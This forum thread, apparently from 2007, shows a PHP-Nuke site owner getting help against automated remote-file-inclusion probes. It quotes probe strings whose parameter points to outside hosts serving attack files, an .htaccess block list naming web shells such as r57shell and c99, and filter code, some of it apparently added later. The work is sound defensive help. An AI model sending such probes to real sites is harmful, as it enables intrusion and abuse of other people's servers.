Nuke Cops :: View topic - Is this an attack??
Guardiannknight
Posted: Tue Oct 09, 2007 4:02 pm

Hello, for the last month at least, my website has been swarmed with these two filter attacks...

Here is the Agent:

User Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

and for the attacks one is

name=http://amyru.h18.ru/images/cs.txt

well, it has my site and some other stuff in there before that, let me know if you need to see that....

the other one is...

name=http://0x0134.lan.io/pb.php


the http on both are usually the same if I'm not mistaken... I have already banned some countries, like AU and NL, and have blocked who knows how many US IP's and have range blocked a lot of IP's from Canada....

So, is this an attack on my site, if so, I guess I'll just have to keep banning IP's if not, I'll need to unban some IP's... I have been getting about 100 plus attacks a day... Sad a lot of them are the same IP, but I ban them and it's like they just use another IP.

If you need any more info, just let me know.

My website is... www.guardiansworlds.com

Thanks for any help anyone can share :)
Evaders99
Posted: Tue Oct 09, 2007 6:44 pm

Yes these are automated attacks against your site. From what I can tell, they allow spammers to use your site to send out their junk emails.

Mostly these are from compromised systems; I doubt blocking IPs would be that effective. At least Nuke Sentinel seems to be working.
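
A log triage for the pattern described in the two posts above, added here as an example and not code from any poster: it groups requests whose parameter value is a remote URL by payload, source IP and user agent. The log lines are constructed (path, timestamps and documentation-range IPs are assumptions); only the user agent and the two payload URLs come from the first post.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined log format. The path, timestamps and
# client IPs (documentation ranges) are made up; the user agent and the two
# payload URLs are the ones quoted in the first post.
UA = "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
SAMPLE_LOG = "\n".join([
    f'192.0.2.10 - - [09/Oct/2007:16:01:10 +0000] "GET /index.php?name=http://amyru.h18.ru/images/cs.txt HTTP/1.0" 403 210 "-" "{UA}"',
    f'198.51.100.7 - - [09/Oct/2007:16:01:42 +0000] "GET /index.php?name=http://0x0134.lan.io/pb.php HTTP/1.0" 403 210 "-" "{UA}"',
    f'203.0.113.55 - - [09/Oct/2007:16:02:03 +0000] "GET /index.php?name=http://amyru.h18.ru/images/cs.txt HTTP/1.0" 403 210 "-" "{UA}"',
    '192.0.2.99 - - [09/Oct/2007:16:02:30 +0000] "GET /index.php?name=News&file=article&sid=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    f'198.51.100.200 - - [09/Oct/2007:16:03:00 +0000] "GET /index.php?name=http://amyru.h18.ru/images/cs.txt HTTP/1.0" 403 210 "-" "{UA}"',
])

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                     r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def summarize(log_text):
    """Count requests carrying a remote URL as a parameter value.

    Returns three Counters: by payload URL, by source IP, by user agent.
    """
    payloads, sources, agents = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        query = urlsplit(m["target"]).query
        for _key, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                payloads[value] += 1
                sources[m["ip"]] += 1
                agents[m["agent"]] += 1
    return payloads, sources, agents

if __name__ == "__main__":
    payloads, sources, agents = summarize(SAMPLE_LOG)
    print("payloads:", payloads.most_common())
    print("distinct source IPs:", len(sources))
    print("user agents:", agents.most_common())
```

On the sample, four different source IPs share two payload URLs and one user agent, so the request shape identifies the probes far better than the address does.
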
Guardiannknight
Posted: Tue Oct 09, 2007 7:43 pm

Yeah, it's blocking all of them :) Hope it stays that way. So, should I unban the IP's I've blocked?
Slackervaara
Posted: Tue Oct 09, 2007 9:21 pm

I use modrewrite in .htaccess to automatically keep those hacking robots out from my site and instead they get a forbidden 403 page. I like modrewrite because it saves Sentinel from blocking a lot of hacking attempts:

RewriteCond %{QUERY_STRING} .*http:\/\/.*
RewriteRule ^.* - [F]

By the way, my site has been attacked by the identical robot, I have found out in the logs.
Guardiannknight
Posted: Wed Oct 10, 2007 3:32 pm

Thanks for the info. :) So, is there any type of filter attacks I should keep an eye out for, or should I just not ban any IP that attacks with a filter?
Guardiannknight
Posted: Thu Oct 11, 2007 6:56 pm

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack.... :roll: SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks.... :shock:
Slackervaara
Posted: Thu Oct 11, 2007 9:49 pm

If you have an .htaccess file use modwrite to block these types of automatic hacker attacks and Sentinel will not block them then, but the hackers will not be successful with their technique.

This is what I have in .htaccess to stop them:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^libwww(-FM|-perl) [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
RewriteRule ^.* - [F]
Guardiannknight
Posted: Fri Oct 12, 2007 4:36 am

So do I just add that code into my .htaccess file? Or is there a program called modwrite?

Thanks for the info :)
Slackervaara
Posted: Fri Oct 12, 2007 9:18 am

Yes, it is just to add it in .htaccess. Modrewrite is a module in the Apache server that fixes this. It must be installed though in order for it to work.
Guardiannknight
Posted: Fri Oct 12, 2007 5:17 pm

I will try and add that in my .htaccess file. Today, I got 850 some emails... :roll: My website is running on lunarpages server, so, I'm hoping this will work... I guess I will find out tomorrow...

Thanks for the info, :)
Guardiannknight
Posted: Sat Oct 13, 2007 7:13 am

Just want to let you know, that worked :) Well it seems it has... :D Because I checked my email today, and no filter attacks have been sent from my site. Thanks big time. :) So is there a place I can keep check, to see if any new code is needed to be added (like if a new attack comes out)??? Just to make sure I'm up to date.

Thanks again Slackervaara, that code did just the trick :)
telli
Posted: Tue Oct 16, 2007 10:51 am

All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

// "http" (which also matches "https") should not be used in any query string
// stripos() replaces eregi(), which was removed in PHP 7
if (stripos($_SERVER['QUERY_STRING'], 'http') !== false) {
   // Send the client back to the site root instead of processing the request
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}
Guardiannknight
Posted: Wed Oct 17, 2007 11:50 am

telli wrote:
All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

// "http" (which also matches "https") should not be used in any query string
// stripos() replaces eregi(), which was removed in PHP 7
if (stripos($_SERVER['QUERY_STRING'], 'http') !== false) {
   // Send the client back to the site root instead of processing the request
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}

So, would it be good to use this along with the stuff I have added to the .htaccess file?
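
The two checks posted in this thread, the .htaccess RewriteCond on the query string and the config.php test, modelled side by side on constructed query strings to show where they agree and where they differ. This is an added example, not code from any poster; `param_value_check` and every sample string except the first are assumptions made for the comparison.

```python
import re
from urllib.parse import parse_qsl

def htaccess_rule(qs):
    # RewriteCond %{QUERY_STRING} .*http:\/\/.*  -> raw query string, case-sensitive
    return re.search(r"http://", qs) is not None

def config_php_check(qs):
    # config.php check: case-insensitive "http" anywhere in the raw query string
    return "http" in qs.lower()

SCHEME_PREFIX = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def param_value_check(qs):
    # Assumed stricter variant (not from the thread): decode every parameter
    # and flag only values that themselves begin with scheme://
    return any(SCHEME_PREFIX.match(v.strip()) is not None
               for _k, v in parse_qsl(qs, keep_blank_values=True))

# Constructed query strings; only the first value is taken from the thread.
SAMPLES = {
    "probe from the thread": "name=http://amyru.h18.ru/images/cs.txt",
    "same value, form-encoded": "name=http%3A%2F%2Famyru.h18.ru%2Fimages%2Fcs.txt",
    "search for the word http": "name=Search&query=http+status+codes",
    "feedback text with a link": "name=Feedback&msg=see+http://example.org/page",
    "normal page view": "name=News&file=article&sid=12",
}

def compare(samples=SAMPLES):
    """Return {label: (htaccess_rule, config_php_check, param_value_check)}."""
    return {label: (htaccess_rule(qs), config_php_check(qs), param_value_check(qs))
            for label, qs in samples.items()}

if __name__ == "__main__":
    for label, verdicts in compare().items():
        print(f"{label:28} htaccess={verdicts[0]!s:5} "
              f"config.php={verdicts[1]!s:5} per-param={verdicts[2]}")
```

The rows where the three columns disagree are the requests one check lets through or another rejects although no remote URL is being passed as a parameter value.
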